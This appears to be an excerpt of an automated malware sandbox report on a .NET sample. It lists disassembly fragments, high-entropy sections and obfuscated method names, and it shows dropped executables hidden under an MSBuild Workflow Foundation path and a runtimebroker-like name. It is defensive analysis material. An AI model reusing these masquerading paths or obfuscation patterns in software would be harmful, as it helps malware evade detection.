                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB12500 pushad ; ret 15_2_00007FFD9BB1251A
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB0BD68 push E8FFFFFFh; iretd 15_2_00007FFD9BB0BD6D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BACBD2D push ecx; retf FFFFh15_2_00007FFD9BACD014
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 22_2_00007FFD9BABBD2D push ecx; retf FFFFh22_2_00007FFD9BABD014
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BAFBD68 push E8FFFFFFh; iretd 27_2_00007FFD9BAFBD6D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BB03A73 pushad ; retf 27_2_00007FFD9BB03A9D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BB069B9 push esi; ret 27_2_00007FFD9BB069CA
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BB06881 push esp; ret 27_2_00007FFD9BB0689A
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BB067A9 push esp; ret 27_2_00007FFD9BB067BA
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BB06630 push edx; ret 27_2_00007FFD9BB0669A
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 27_2_00007FFD9BABBD2D push ecx; retf FFFFh27_2_00007FFD9BABD014
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BAFBD68 push E8FFFFFFh; iretd 32_2_00007FFD9BAFBD6D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BB03A73 pushad ; retf 32_2_00007FFD9BB03A9D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BB069B9 push esi; ret 32_2_00007FFD9BB069CA
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BB06881 push esp; ret 32_2_00007FFD9BB0689A
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BB067A9 push esp; ret 32_2_00007FFD9BB067BA
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BB06630 push edx; ret 32_2_00007FFD9BB0669A
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 32_2_00007FFD9BABBD2D push ecx; retf FFFFh32_2_00007FFD9BABD014
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 37_2_00007FFD9BB0E3E0 push edi; ret 37_2_00007FFD9BB0E4E2
                                    Source: winIntorefruntimebroker.exe.0.drStatic PE information: section name: .text entropy: 7.424721058319474
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe.4.drStatic PE information: section name: .text entropy: 7.424721058319474
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Ve1cELzpXOAiOjGbv9.csHigh entropy of concatenated method names: 'K8Hkkgc7Ct', 'FEEkGMiCNl', 'XUNk20PNnc', 'lTHk3Qg1WO', 'Xgmkw9g3vn', 'VgJkqaSNyr', 'JxKkJddVrD', 'KJ5TcTktTSaYcWqwrT4k', 'kLakkKktiLGeyqrqbSys', 'bftckOktF6fBRooTBgJL'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, x1DWgjnrSjbauXolqZ7.csHigh entropy of concatenated method names: 'rDcn95DuRR', 'Gs6neyTgvU', 'WsvnPUgMOx', 'a2L2ghkm0RpD7KZGf1iU', 'iGPDxgkmo9ggqhLxijlq', 'suIYEWkmHsivX35L2LEH', 'tqgE5okmZsyRTojcCvct', 'J0b6jakmC1VXNsLtk3lx', 'OCct0Rkmr3jW7oDVx9gf', 'pbdrErkmLhmb02JAQ75y'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, w1c6YnswbdDHwFf3fIH.csHigh entropy of concatenated method names: 'wyOOl5kjReufJPmEWqv5', 'UTOpGdkjVKe5HkixHXYj', 'WwXeAlkjXOsVVnj9ZVfu', 'RNgsygyPCq', '_1R8', '_3eK', 'rRNsJH1qb1', 'Dbgso4mcex', 'gV4sH6HlyL', 'gQos0NQJVw'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, IxEpTmJCWgSWwBQ7BFS.csHigh entropy of concatenated method names: '_54f', 'd65', 'ODok22YAfAO', 'Nc8k23Y4JD4', 'AWAkyK4ihup', 'RJFk2plj3EX', 'Eg6VZfkaIhT0uPZ1pWAo', 'BrYvFykaxpL9tcOiTEjl', 'QgP8GWkaBjkh3IboZacm', 'xf6vF6kaUFT1jtD4c5t9'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, oZR8F82aXprYBh6qK8e.csHigh entropy of concatenated method names: 'z8K2Vu6OKR', 'NsQ2XxsjJb', 'LEpYAIkF6j36CRnQTlGl', 'Ewd74ZkFQTiNnEvlmuu3', 'lEOUMGkFDKoKIeIsZicM', 'GDiEObkFtSPWwbwlTCuU', 'OJ9JFOkFnMU4fY55I7G3', 'ai18sWkFTei5Dl7TNpV7', 'zyZj7YkFit7JOjRZdbWd'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, w3mb9j27GTnOfjRrLYl.csHigh entropy of concatenated method names: 'K8e2MFpRqE', 'Cr62fljMa2', 'erW2z84LQL', 'rxRckakFScUhDCTKiUIu', 'D486e2kFdWtdgqjkaiee', 'sEZA54kF5MguXUI6EDan', 'PpM7GGkFmhmi334v4A2T', 'bqY2bioxex', 'g392W5ikrx', 'f0I21c8CfR'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, J1KBu9XgToJfQU5LQhi.csHigh entropy of concatenated method names: 'IfkD0RkbN3VWMhaPWNe2', 'TtPjnMkbXoBaPJsG8Cq8', 'qan8QQkbO50tPJO4mwbT', 'L4hc8fkb4PONgm4Bt2jj', 'lvrbo3kbalry6BYdygy3', 'zUCDKdkbRAPMjmHOrHl0', 'aC66sqkbsHe04mUh0XIF', 'Slut2QkbcJJP1EnmX1W9'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, e7nNAg8ALhewoq4HQiS.csHigh entropy of concatenated method names: 'MYh8lPUhqL', 'rOM8hUtk7E', 'vixdBKkTGUTa043sKklD', 'fCcwmPkTkUDlEJVedSMH', 'i4SDWjkT8N7YNENeIY0u', 'IPmrhOkT2hRicqR2k1GM', 'Xvv6eckT3dxjmWKBgmkU', 'bpQFPykTwNdoO0IIVrYx', 'VOFgvikTqoujVw6kcGR9'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, b72uhOVIEpDC2JLCAAo.csHigh entropy of concatenated method names: 'DnUVBdTu2U', 'X5TVUMvSoX', 'Kk8V59Whok', 'rGxVmCryKx', 'pUvVSXEWr0', 'NyfVdn3aeb', 'XmWVj3GLE6', 'FJbV78FPHj', 'A3KVYRhZjC', 'yT2Vb4fgqf'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, LLuKj3ek0m0HLZJsvI.csHigh entropy of concatenated method names: 'eOi4i72Y8', 'yfFJF1kDuOPAgnbApaYr', 'fpNXsMkDv8ZdUS5VZGwJ', 'HF7kFOkDWcNaNoXXJClR', 'ndj3o1kD1QnVG7v8Wccx', 'xVTALotdr', 'XF0gtmb3G', 'bRwlsZHbH', 'BwQh7ycbd', 'qffEGmbXl'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, fERMkYngXNssLf4yTQC.csHigh entropy of concatenated method names: 'm8rnhlPZd9', 'UySnEU7NJN', 'j3lnKNEACR', 'VNtn6TQ5BB', 'GWbnQ8iTKO', 'jVknD23lqe', 'etBougkmAPnZ21OK8JkH', 'xR1rR6kmeqEMNDNEvDCZ', 'TWBKE8kmPjX8lUTbCU95', 'UyFZsMkmg5pVpbGSU9Rn'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, N2VujOMBctjcLuqC6Tq.csHigh entropy of concatenated method names: 'RTqkwSaRSMT', 'w54kwdsEBvH', 'fMckwjemS0r', 'lqvkw7RdNKZ', 'SMfkwYerb4b', 'doxkwbYUH9m', 'X7tkwWhQcNx', 'BTwfJmVXXu', 'nH3kw1jx9Xx', 'lMQkwufAdFx'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, vVsTnZGMwhpQZMeBYH7.csHigh entropy of concatenated method names: 'YZR2rZovZ6', 'l3vNpKkFGK5Ku82IAZcW', 'cJbJekkFkT2Rm8Ae7VGi', 'zOLNoLkF8eSMPAKbdJLn', 'C6r2WSkF2p5P8s5gU8k9', 'RqvHXRkFykjmSm7BZcTq', 'oLMM6NkFwKhUOYPmoMdy', 'znF5PFkFqL5q2eH9VMja', 'Ja82ECmk9m', 'PtgfEQkF0FnhdBECUROL'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, VhEcR6JW83X3PJCGAfi.csHigh entropy of concatenated method names: '_46E', 'd65', 'zLUJudJgoQ', 'NSFkyiUSs1r', 'RJFk2plj3EX', 'EnmJvxbuQs', 'GgMgvikRDUnSjfs9bIQ0', 'hnyTB9kR6YwbdkWID5Jg', 'zU3ZH5kRQQunBBjp4Z18', 'Lab1oLkRtj0oSBaWuTKV'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Q8dARBwU5WX5tj6M8hO.csHigh entropy of concatenated method names: 'EGZqpJ0xih', 'cOCqk0iVBY', 'P4sq8TZ3B9', 'mQF15kkcSdxlx4fCBMRK', 'oPwc4bkcdSCgC8OApUFr', 'rXhXH4kc52sx7Juq5vd8', 'j7C9YNkcmZMASIJNiMCu', 'XolwmvLAkN', 'KPOwSGiAIy', 'AkrwdgPEYf'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, UwdCVwYZfSJykuaVaZg.csHigh entropy of concatenated method names: 'akMkwVsbmsj', 'cJ4kwXssfqA', 'd7rkwOjkniH', 'bHhvNqkuOyGoRy9GnwvD', 'WqqssekuNeeVVfdu1Tvq', 'NhsSmekuIhv3eUivmYt8', 'kZ8kymIK6l4', 'cJ4kwXssfqA', 'B8LBYTku5e5D8ELGE4qx', 'pitgLgkuBbfOhJG2ej9x'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, nAHeEeJzVNNO72wuddp.csHigh entropy of concatenated method names: 'pO6owwtgQf', 'JFRPG1kRXZGnehxDqx4n', 'TRutQnkROZ9kGkLlPQ44', 'kS8PAKkRNek0pQ9fJtcf', 'J8eLhlkRIOQLEmhOCInV', 'eq7', 'd65', 'FAnk2l0kSHw', 'pWCk2h2rjD0', 'LLbkyFerv3I'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, j6jLOI7QuDGUBsCKMGO.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'hrY7teSMmh', 'JZFoksk1aqyLLbAPJaHH', 'qc4T1Sk1R2wtjZ3w8M9f', 'efpIu5k1VT3ty6dhsHXP', 'YdADnLk1Xr5Yfv2tZxCa', 'Lsl61Dk1O8WbqpH5WZwb', 'SQpJGIk1NF5mkctw28aj'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Qr2vJkulGbfJGi4ursy.csHigh entropy of concatenated method names: 'cIr3yIkMi0a6rM3BnU1R', 'xnPWh2kMF1peHapqB5Oj', 'mjRvvBK6KW', 'OTq3QykMagfQqAyKjYni', 'LQ87l7kMRW04ProApUqG', 'U8pRtRkMVM0TcbR9gDXj', 'xEr0GUkMXGiXY8mv0XgE', 'MuTHuSkMOyrCoNo6Wr1h', 'FZ8bJ9kMNb4CMy2uCl0k', 'ECrLgtkMIRCYWOwQ8HYp'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, BJIc5pCsFgRYC8rSQwJ.csHigh entropy of concatenated method names: 'j9l', 'SPpC4Po6df', 'HpjCa0ajvN', 'ynbCRbx12w', 'Nu9CVGXgQ2', 'MsPCXWHDN2', 'FUSCO6Foew', 'CZVUcGkOnK8ZFNmS98T0', 'RtaBlakODweH1msOgMy0', 'bTpw96kOtYur8Xs0wMP0'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, eLq8ZhHw4UBPgWtcCGo.csHigh entropy of concatenated method names: 'v0kcWhkXemuXuOoftvxm', 'TRhRWkkXLHXbhsXk9Oj7', 'k8xRVNkX9K6KI3m9yPhZ', '_7kT', '_376', 'SEMHymsG4M', 'WmRHJkTHWy', '_4p5', 'yieHoPEWlc', 'qCTHHRRDJh'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, GxMcIHFtDoF2AHQ0rsc.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Es5YXhFsoNTde16jMpZ.csHigh entropy of concatenated method names: 'yiTF4lu1jS', 'AYrFalI0Zt', 'OUNFRHV8BN', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'TJHFVpJaHU'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, sUqIGoay0QdqOqVijEt.csHigh entropy of concatenated method names: 'jJ8aoSfy1k', '_64r', '_69F', '_478', 'EI5aHu1Wex', '_4D8', 'RKTa0STQpL', 'TLHaZWuCiX', '_4qr', 'DdFaCpaaRp'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, K1lPB6qKun7YxcDe9W9.csHigh entropy of concatenated method names: 'GVlqiRy9T7', 'gkWlTMk40nt3fEyvh65w', 'iFVEakk4orVEtQ8F44Qi', 'F7saKrk4Hc303swCMUxS', 'sM6FwOk4ZQcMPvBnIfk0', 'Eh3UoUk4Ce49UoKWL5bV', 'TOCqQtSw2X', 'a1e8Xdk43kDJ7vOAUnRE', 'BbWZr9k4wsJxHmatI3IK', 'g1Fdwwk4qYhXfUX6Zu3N'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, uhrbM22NLh2Y9jKsdUp.csHigh entropy of concatenated method names: 'wO92d3Z5aB', 'sjYiBukFOGIfE4Ncq0D7', 'OWmLSYkFVyNbMcow8EpJ', 'slE503kFX6C2Ewl15Fy4', 'QuO2xcWNRs', 'Vn92B6lyiW', 'e2D2UAFO2r', 'iMZSkbkF4p6Wm02q3af1', 'SerBTqkFsZl6xKUIege5', 'TTpnMHkFcWqqSk36iRcB'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, hLAIEjqc4V6AQxbGbr8.csHigh entropy of concatenated method names: 'nlAqmli2rR', 'MNqqS8LqVr', 'XYdqdxjI3T', 'fUOGuTk4nycA8cnj9UhZ', 'zZrRwTk4TPklpIVDktxx', 'NtkruHk4DG8PKf0TyGMM', 'VCaC0Vk4tlgGxwrYXywI', 'aMOqa2nx3c', 'I1aqRF2eTE', 'OtIqV8uGtb'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, mORHcOwqABYBrWWZPkc.csHigh entropy of concatenated method names: 'TdFwgd2qX3', 'X38wlGK5oG', 'yDvMjakc8eG8C5ENpHTS', 'TKIMF3kcpr0tZgSSHnA2', 'dJHFxlkckSdU6sT334Au', 'bD1weem6L6', 'hKVwPC0oGA', 'oGdartksMGrHgBQcRmpv', 'AVYLVFksu2UMnUhUeYA9', 'BncsZsksv3LNMdB1GrTZ'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, fOX3Kl8BfiCnjX4moFw.csHigh entropy of concatenated method names: 'aWV8MjjUxF', 'Jur8fBagBF', 'Yil8zxGHLg', 'BK87CykTXe7oca6PORf2', 'tXpAa0kTRAESwUkGbYSh', 'ztk06YkTV31Vao345ADr', 'S22G3gVKdY', 'TifyY4kTxgHXYou35aff', 'vSNX3ekTNfr0ucRyrDu6', 'po743KkTIGWYQDTdxX6u'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, jwwoaA7FevSJ5D8etdZ.csHigh entropy of concatenated method names: 'OHU741m1Dh', 'D0C7XXq9Vf', 'qtn7IKaebX', 't5a7xoBocI', 'hMe7BOkJsG', 'J0H7UO5jXL', 'vRK75yuySm', 'MNe7mPNce4', '_0023Nn', 'Dispose'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, sh9GfHeQRpktblJnWFR.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Eya91eGoxXXnnlNABnL.csHigh entropy of concatenated method names: 'IRiG0TbE5J', 'tLTGZTafJV', 'UP1GCfGnrl', 'iaf8kGkTbj924YyOrIuF', 'ENgfHWkTWIeASBWVlAFH', 'YFySTMkT7vlExWgh091C', 'FEny3vkTYt250LerMpBI', 'Ppjo8ikT1GByh0qHJmCv', 'eLOPy8kTu2ikueZ6tgqt', 'VWClCGkTvRg2EmDeSPJw'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, McyiD7GaPwcq59vt95V.csHigh entropy of concatenated method names: 'x01GVRk18U', 'ERxGXsnA58', 'mWoGOlQaQp', 'AKxGNnfAf0', 'PSOGIHb8Yt', 'xnhGx1qeWc', 'OSmGBVYQyq', 'nCGGUJsfoQ', 'NF4G5Ejbof', 'Tu3Gmaho8y'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, CWG2i3nYrDnj0OSi3x5.csHigh entropy of concatenated method names: 'arpnW6VYtw', 'JVtn1vVRHt', 'gFXnuqeUNh', 'ssGnvSbOTP', 'oSvnMSB9M3', 'VdSnfHaFCY', 'b3ynz26FRJ', 'VwnTpAS3df', 'YTYTkgGaqT', 'FGKT8LXkTV'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, KtGLOk2Qr45g1gMa7mv.csHigh entropy of concatenated method names: 'VCy2t007vc', 'rDP2nlhtPh', 'Uw32TupKKC', 'm9j2i2OUfc', 'alxoRRkFPJWqfSj7KiFM', 'tvyBXXkF98QPG4bkntqT', 'shhdOSkFeJIMCUS91B78', 'sYyDbdkFAIGCg9CZabGl', 'F6icBEkFgP7duuF0pf0q', 'upP6fUkFljMAGLX243qj'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, HHUGBfoLLj5Pvs7hNtx.csHigh entropy of concatenated method names: '_5t1', 'd65', 'L0Hk2DSSRBI', 'UgVk2tGBYXs', 'xOioeEAqZH', 'zCAkycvYi6a', 'RJFk2plj3EX', 'voplIYkR1I39rHQiSGyd', 'fKxq7kkRuRm4LR4S0Gg7', 'YTX5WCkRv4IEwckgloAW'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, wPPp40F1gF291tGeELD.csHigh entropy of concatenated method names: '_2JN', 'A67', '_49I', 'fSbFv3XVAS', 'aiKFMMK2EN', 'kbHFf0RMcp', 'RPkFz815nI', 'sKYsp5CoLF', 'Xr5skrYsJ9', 'CpItmkkjhuDewhfM8WBp'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, SxOWr5W00uFXLabCfuQ.csHigh entropy of concatenated method names: 'VGPWCu6lMS', 'ArGWrTRnyr', 'lGjWLdXBJu', 'vaPW9vRdrW', 'sAwWeXlLmP', 'eKrWPnk3Dv', 'v89UJYkv1eOlNDuLkey9', 'blZk0akvuRQFHA0rPLMp', 'CXIeUVkvvCdQ5rpNHXDM', 'ASWPWnkvMU4IFiEXBc9o'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, NaZkwMnoUXyqwwZRSfi.csHigh entropy of concatenated method names: 'Wq8n0tPLCl', 'KaYnZo8t83', 'TfUnCMUGKM', 'TNrXu3km3LOTNCdWsENM', 'vOj3NLkmGZZXgb5oKKW4', 'tVoPpDkm2OtSQogI170D', 'N0qqM6kmwsmCS6QsE6Lv', 'WBcS7mkmqb4LhnQ6CuS8', 'OrfGKQkmy712HGAh2wJh'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, CiRMKUFpP5Z7v8dDZGE.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, yBY00RkNiRRLray4gWb.csHigh entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'FpekyeQeGfX', 'HY1kGjqsMBO', 'qdjHlKknCEEyRBINuaKw', 'wIZF6aknrJRqrAfGj1d4', 'BAeDYCknLDisjPPTC2SO'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, xClD6S4SPgW8TQ2Jr5v.csHigh entropy of concatenated method names: '_25r', 'h65', 'Ge64j0lMXR', 'g4Q47TR8nj', 'YbU4Yl742I', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, etoBl6ERj78SeSsVjOq.csHigh entropy of concatenated method names: 'cf7tQkMMXf', 'AsZtDky2oq', 'u2Tn5Kk5TMJtem3SE1ea', 'WJdB8wk5tSMSYK7iPZUI', 'u4sb6Ok5njSC7UGCCQDt', 'h5QEdWk5iEiQZY3HccW7', 'Xgbts4Uhct', 'CQOTxhk54d0UmYyg5j5L', 'y8ZFU1k5ssUnekYPFyw9', 'rrekHFk5cOprdlLKeIIc'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, abm5dEiGBaM8NyZn4KT.csHigh entropy of concatenated method names: 'NwEi3bPSEi', 'xaQiwvdUWk', '_7Bm', 'B1ZiqFY0KG', 'zNQiyBFcV7', 'MJuiJAs0a3', 'kHGioJEXUl', 'Np2D4gkSx4y5h9SiGEwX', 'qweZaZkSB9BTifnis9ys', 'Xgfk2OkSULpM34DE2AO0'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, xHMBjSoJq38xvTMBGal.csHigh entropy of concatenated method names: 'UNloCwNnji', 'FKZ7YdkR7EgRGLZJIRAo', 'KVDbBAkRdy8Ck9Xl3VTD', 'vSvC8JkRjhMYxe5ICds6', 'mroZaTkRYStudcjpvQsv', 'b5Sww0kRbTXmuCi9GudJ', '_53Y', 'd65', 'GhAk2Kn4Dph', 'PR5k26ofBQx'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, A5pwfYbf4XgyOYxdJ6L.csHigh entropy of concatenated method names: 'rycW8KStTa', 'lBIWGQxi3D', 'tP4XSgkvxA6SiR6LcVO2', 'gPVTO5kvBjaEsDoa9JjN', 'qTZDYSkvN3YLLpZILETV', 'SWyEoxkvIpwecWIVwfbN', 'Rl8pSakvUieN3xJIsIsP', 'GflWONkv5dtENEBKxZZk', 'nwJWp836jp', 'soXG0JkvRJSn3o7KTGCJ'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, BWLwy5qWYubE42Px2D8.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'Snl0cIk4Xt1vRSFo4mCC', 'w8wCB4k4OhIICa08KmS5', 'hWRv9ok4NbGFS8i6n1xy', 'TQm760k4IrJefiSMYD8c'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, mhQqAL9EBpxBqJGo6E0.csHigh entropy of concatenated method names: 'kgc95m3Zi3', 'I0I96DeWMG', 'sIo9Q3XROy', 'XD19DM0oYk', 'sRi9tEb7HR', 'mn79nsdmQB', 'gTa9Tm143q', 'iLh9i2U3If', 'lbv9FYm4BB', 'Hxt9spTeux'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, a9PE5WRE9xrARfrPalW.csHigh entropy of concatenated method names: '_0023wjg', 'Dispose', '_0023Trg', 'MoveNext', '_0023Zvw', 'get_Current', '_0023Wrg', 'Reset', '_0023Xrg', 'get_Current'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, BeNFHgCrZNSspLG2KNU.csHigh entropy of concatenated method names: 'XBfC9rpJNo', 'SiqCeBoWJh', 'NYQCP8ySCc', 'DrGvDHkOh1NCDxHFpoa5', 't4SWPMkOgKwyIIH7wZuf', 'wyAJYekOlcy6rBWty7o5', 'XoKBvakOEN6S54HvBt4Y', 'WIKnPIkOKdK5GQBYPfN2', 'T04IU0kO68tJ7AyktsRL'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, ppUjAxiU9Njow2oOIX9.csHigh entropy of concatenated method names: 'AEm', 'by1', 'KG0imDlAMP', 'uM7', '_197', 'rZu', 'Q1J', '_24u', 'U67', 'xj7'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, fvElIZ3mw2XT4qS18HS.csHigh entropy of concatenated method names: 'MQp3vWVM0v', 'KcK3MSmYdS', 'J5hopAksaKNEflCvZE1m', 'MKR6A7kscENgRjHx2Uaf', 'NgfOtbks470VD61UYfLw', 'albFMQksRvoSu5cV78vQ', 'b5gwkA3Fec', 'AGyZh5ksNiBZcpJ6cjGh', 'c7179vksXOkr2pPR53m9', 'raAMxQksOUdCfwQ1BGNg'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, GaviKWj7ZralkGFucoG.csHigh entropy of concatenated method names: 'wMbky5gZEBZ', 'Ckojb2w356', 'Q0vjWQ9pJ1', 'UcIj1cJhmP', 'lvwOINkWVT4vXgKntTy1', 'WT99cHkWXTZtFYoXZ2mk', 'lSeSHJkWO6rtd8RcPQb6', 'XijEdIkWN1Gr5LPYaY5O', 'G0dQmkkWI7yo0CerTJoJ', 'BN75kmkWx4su9gGGScVK'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, UIsIJDGWeWaypY2axBZ.csHigh entropy of concatenated method names: 'JVGGuC6avl', 'eZSnt1kiV1k0Y8rbUV8N', 'u8Zdp4kiXLG7uvH2UpVs', 'slOy8ikiOvFX08qiCRmT', 'eXJCyHkiNAvI3yUh7IeP', 'TcQZdckiaw2gT4dcNsKg', 'PggYE3kiR9x6raB2tFEF'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, SlLs2JqHlBXN0cf56Hf.csHigh entropy of concatenated method names: 'zNjqZdqgDq', 'YdYqCSCxqu', 'CbDqrJwZxQ', 'pVhefFkcvd5idR7kKkje', 'ChkXB2kcMSnR1Qv9emoI', 'EOPTbqkcfA8lGJExOoNY', 'aGWFX4kczFQ5Ap6kMbOG', 'jiK6gUk4pSOnPv1GJ8jV'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, e1RmYyY2DIJC3nRnLSu.csHigh entropy of concatenated method names: 'cgkYw014si', 'wdXYqCZmOL', 'R7fYystxwR', 'eVuYJNyrCb', '_0023Nn', 'Dispose', 'vr78eNkukELSOwVuXIGm', 'skpamxku8bK5JoctVB7n', 'mT3XOXkuGUrYnx62dPM1', 'UqN4Nuku2Xl2IyAmJUnZ'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, SIaDYtZBRQ7pqpEESFK.csHigh entropy of concatenated method names: 'zMvZ5edhWN', 'DQHZm143dw', 'LSbZSiENCE', 'TK3ZdPTM5M', 'M5oZjn4VVC', 'COM7RVkO29B4BNZibxOH', 'eEhnQ4kO80ysxqZd3kTY', 'dXDNN5kOGRNJDKAnnOBm', 'KCBhKrkO34vteeaXpkgO', 'qD8xEokOwg0ahw0tQdxx'
